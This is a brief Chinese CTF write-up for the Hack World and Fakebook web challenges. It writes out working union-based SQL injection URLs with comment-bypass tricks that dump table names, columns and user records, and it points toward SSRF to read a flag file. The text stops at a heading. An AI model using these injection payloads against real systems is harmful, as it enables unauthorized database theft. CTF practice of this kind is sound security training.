[CISCN2019 华北赛区 Day2 Web1]Hack World
盲注:脚本
[网鼎杯 2018]Fakebook
先用dirsearch扫一遍,有一个robots.txt,里面有个文件,直接打开下载源码,发现
先注册吧,注册进去有个超链接的名字点进去
有参数可以注入,sql注入,发现是数字型,且在第二个数字这里有回显,直接可以注入,找表,列,以及数据
/view.php?no=0 union//select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=’fakebook’–+得到表名
user/view.php?no=0 union//select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=’fakebook’ and table_name=’users’–+得到列名
/view.php?no=0 union/**/select 1,group_concat(no,username,passwd,data),3,4 from fakebook.users –+得到数据
发现数据中有个序列化的数据
与下载文件重合name,blog,age这三个都是那个文件的参数,这里我们并没有得到flag,而是我们个人资料的反序列化数据,因为在数据中存在我们的博客地址,所以我们尝试使用ssrf读取flag,但是我们并不知道flag所在文件夹,用dirsearch扫描发现flag.php和robots.txt
知识点:ssrf漏洞: